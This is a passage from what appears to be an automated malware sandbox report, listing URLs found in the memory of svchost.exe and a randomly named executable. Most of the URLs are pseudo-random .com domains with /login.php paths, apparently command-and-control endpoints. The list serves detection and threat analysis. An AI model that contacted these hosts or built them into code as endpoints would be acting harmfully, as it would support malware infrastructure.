00000018.00000002.1833090885.0000000001375000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000018.00000002.2055807285.0000000009187000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000001A.00000002.1914326367.000000000077D000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000001A.00000002.2109919252.00000000086E7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://qetyvep.com/login.php
Source: svchost.exe, 00000002.00000003.1389634570.0000000008AA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qetyvep.com/ydLMEM
Source: svchost.exe, 00000002.00000003.1665250528.0000000000884000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qetyxiq.com/
Source: svchost.exe, 00000002.00000003.1592132421.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1595141664.000000000089D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2127985207.0000000008B75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qetyxiv.com/login.php
Source: svchost.exe, 00000002.00000002.2626694653.0000000008B77000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1610082181.0000000008B24000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2623952843.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2616565446.0000000002F67000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2142459408.0000000002F1D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1617654306.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1613723889.0000000008B28000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1606037853.0000000008B24000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2615554415.0000000002F1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qexyfag.com/login.php
Source: svchost.exe, 00000002.00000003.1437455290.0000000008A14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1665250528.0000000000884000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1432764888.0000000008B0F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1664665430.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1433688306.0000000008B16000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1661335994.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1432912644.0000000008B12000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1433691652.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1432910805.0000000008B11000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qexykaq.com/login.php
Source: svchost.exe, 00000002.00000003.1592132421.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1592136244.0000000002F1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qexykav.com/login.php
Source: svchost.exe, 00000002.00000003.1411284154.0000000002F30000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1610082181.0000000008B24000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1389905582.0000000002F2A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1615937487.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1402185075.0000000002F2A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1617654306.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1613723889.0000000008B28000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1411345133.0000000002F34000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1401679434.0000000008A14000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000005.00000002.1841589649.0000000001139000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000005.00000002.2052149448.0000000008EEC000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000006.00000002.1841991306.00000000014FC000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000006.00000002.2054776037.00000000093A0000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000000D.00000002.2086886336.0000000009561000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000000D.00000002.1859768092.000000000147F000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000000D.00000002.2073814977.000000000936A000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000011.00000002.1919088226.0000000008414000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000011.00000002.1795928621.0000000000838000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000013.00000002.1804176921.0000000000A5F000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000016.00000002.1826196829.0000000000C79000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000016.00000002.2033815046.000000000881B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://qexylup.com/login.php
Source: svchost.exe, 00000002.00000002.2626694653.0000000008B77000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1556061520.0000000008A14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1937479340.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1911552556.0000000008B6C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2044639986.0000000008B6C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1830571345.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1861091241.0000000008B72000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2045768203.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2127985207.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881038659.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1547357675.0000000002F1C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1918717004.0000000008B71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qexynol.com/login.php
Source: svchost.exe, 00000002.00000003.1592132421.0000000008B75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qexyqip.com/
Source: svchost.exe, 00000002.00000003.1592132421.0000000008B75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qexyqip.com/H
Source: svchost.exe, 00000002.00000003.1592132421.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2616565446.0000000002F67000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2127985207.0000000008B75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qexyqip.com/login.php
Source: svchost.exe, 00000002.00000003.1725832517.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1516145875.0000000002FAC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1514730678.0000000000882000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qexysig.com/login.php
Source: svchost.exe, 00000002.00000003.1533224308.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533904520.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742184996.0000000008B73000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1532709108.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1763387928.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533888500.0000000008AFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qexytep.com/login.php
Source: svchost.exe, 00000002.00000003.1533224308.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533904520.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1534594675.0000000002F1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742184996.0000000008B73000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1532709108.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1763387928.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1741281252.00000000008A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qexyxuv.com/login.php
Source: svchost.exe, 00000002.00000003.2481161521.0000000008A6E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2623816509.0000000008A6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vocygef.com/8
Source: svchost.exe, 00000002.00000003.2481161521.0000000008A6E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2623816509.0000000008A6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vocygef.com/http://lyrywoj.com/
Source: svchost.exe, 00000002.00000002.2626694653.0000000008B77000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1610082181.0000000008B24000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2623952843.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2616565446.0000000002F67000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1617654306.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1613723889.0000000008B28000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1606037853.0000000008B24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vocygef.com/login.php
Source: svchost.exe, 00000002.00000003.1592132421.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1875058594.0000000008AFD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1616788232.0000000008AFD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2114095830.0000000008AFD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1726674244.0000000008AFD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2120851467.0000000008AFD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2625560575.0000000008B0D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2481952075.0000000008B0B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2481301734.0000000008B05000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1596880550.0000000008AFD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1664741807.0000000008AFD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1826452671.0000000008AFD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1598705927.0000000008AFD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1710839880.0000000008AFD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2081707795.0000000008AFD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1913661867.0000000008AFD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2132271145.0000000008AFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vocykec.com/login.php
Source: svchost.exe, 00000002.00000003.1665250528.0000000000884000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vocykem.com/
Source: svchost.exe, 00000002.00000003.1556061520.0000000008A14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1841242367.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1800870882.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1547357675.0000000002F1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vocymak.com/login.php
Source: svchost.exe, 00000002.00000002.2626694653.0000000008B77000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2482360119.000000000089F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2623952843.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2130977590.000000000089D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2606846587.00000000008A5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2138962739.000000000089D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2483073459.00000000008A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2127985207.0000000008B75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vocymum.com/login.php
Source: svchost.exe, 00000002.00000003.1501618192.0000000000882000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vocymut.com/
Source: svchost.exe, 00000002.00000003.1575374563.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2044639986.0000000008B6C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1576652644.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1576507810.0000000000882000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2045768203.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1573167022.0000000008AC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vocypok.com/login.php
Source: svchost.exe, 00000002.00000003.1533224308.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533904520.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1534594675.0000000002F1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742184996.0000000008B73000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1532709108.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742183929.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1763387928.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1741281252.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533888500.0000000008AFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vocypyt.com/login.php
Source: svchost.exe, 00000002.00000003.1592132421.0000000008B75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vocyqot.com/
Source: svchost.exe, 00000002.00000003.1592132421.0000000008B75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vocyqot.com/http://lygyfej.com/H
Source: svchost.exe, 00000002.00000003.1592132421.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2626694653.0000000008B77000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1595141664.000000000089D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2127985207.0000000008B75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vocyqot.com/login.php
Source: svchost.exe, 00000002.00000003.1592132421.0000000008B75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vofybet.com/login.php
Source: svchost.exe, 00000002.00000003.1592132421.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2616565446.0000000002F67000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1595141664.000000000089D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vofydak.com/login.php
Source: svchost.exe, 00000002.00000003.1411284154.0000000002F30000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1610082181.0000000008B24000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1389905582.0000000002F2A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1398889541.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1402185075.0000000002F2A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1617654306.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1613723889.0000000008B28000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1411345133.0000000002F34000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1401679434.0000000008A14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1606037853.0000000008B24000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000005.00000002.2052149448.0000000008E50000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000005.00000002.2052149448.0000000008EEC000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000006.00000002.1841991306.00000000014FC000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000006.00000002.2054776037.000000000942D000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000000D.00000002.2073814977.000000000933F000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000000D.00000002.2086886336.0000000009561000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000000D.00000002.2073814977.000000000936A000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000011.00000002.1795928621.000000000088C000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000011.00000002.1919088226.0000000008414000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000013.00000002.1934543116.00000000089D0000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000013.00000002.1934543116.0000000008A00000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://vofygum.com/login.php
Source: svchost.exe, 00000002.00000003.1574079590.0000000008B24000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1575374563.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2044639986.0000000008B6C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1573175976.0000000008B24000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2045768203.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1573167022.0000000008AC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vofyjom.com/login.php
Source: svchost.exe, 00000002.00000003.1533224308.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533904520.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1532709108.0000000008AC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vofyjuk.com/http://vofyjuk.com/H
Source: svchost.exe, 00000002.00000003.1533224308.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533904520.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742184996.0000000008B73000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1532709108.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1768332596.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1763387928.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1539362714.0000000002FA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vofyjuk.com/login.php
Source: svchost.exe, 00000002.00000003.1725832517.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1529606311.000000000089E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1722529774.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1516145875.0000000002FAC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1724383433.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1529645254.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1514730678.0000000000882000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vofykoc.com/login.php
Source: svchost.exe, 00000002.00000003.1411284154.0000000002F30000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1389905582.0000000002F2A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1615937487.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1402185075.0000000002F2A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1402016007.0000000002FCC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1390680436.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1617654306.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1411345133.0000000002F34000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1390079893.0000000008A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1401679434.0000000008A14000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000005.00000002.1841589649.0000000001139000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000005.00000002.2052149448.0000000008EEC000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000006.00000002.1841991306.00000000014FC000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000006.00000002.2054776037.00000000093A0000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000000D.00000002.2086886336.0000000009561000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000000D.00000002.1859768092.000000000147F000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000000D.00000002.2073814977.000000000936A000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000011.00000002.1919088226.0000000008414000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000011.00000002.1795928621.0000000000838000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000013.00000002.1804176921.0000000000A5F000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000013.00000002.1804176921.0000000000A2D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vofymik.com/login.php
Source: svchost.exe, 00000002.00000002.2626694653.0000000008B77000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1725832517.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2104244256.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2623952843.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1615937487.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1841242367.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1800870882.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1930409487.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1661335994.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1711907800.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2051969437.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742183929.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1716704828.0000000008AC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vofypuf.com/login.php
Source: svchost.exe, 00000002.00000002.2626694653.0000000008B77000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2604355342.0000000000812000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2623952843.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2616565446.0000000002F67000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1617654306.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1612298098.00000000008A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vofyzyc.com/login.php
Source: svchost.exe, 00000002.00000003.1800870882.0000000008AA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vojybim.com/
Source: svchost.exe, 00000002.00000003.1859997516.0000000002FAB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1559578676.0000000008AA8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1841242367.0000000008AA0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1560390344.0000000008AA8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1559905278.0000000008AA8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878418467.0000000008AD6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vojycec.com/
Source: svchost.exe, 00000002.00000002.2626694653.0000000008B77000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2616565446.0000000002F67000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2127985207.0000000008B75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vojydoc.com/login.php
Source: svchost.exe, 00000002.00000003.1800870882.0000000008AA8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1547218137.0000000008B1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1547224905.0000000008B11000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vojyduf.com/
Source: svchost.exe, 00000002.00000003.1556061520.0000000008A14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1809959193.0000000002F1D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1547357675.0000000002F1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vojyduf.com/login.php
Source: svchost.exe, 00000002.00000003.1592132421.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2127985207.0000000008B75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vojygym.com/login.php
Source: svchost.exe, 00000002.00000003.1389634570.0000000008AA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vojyjof.com/http://vopybyt.com/
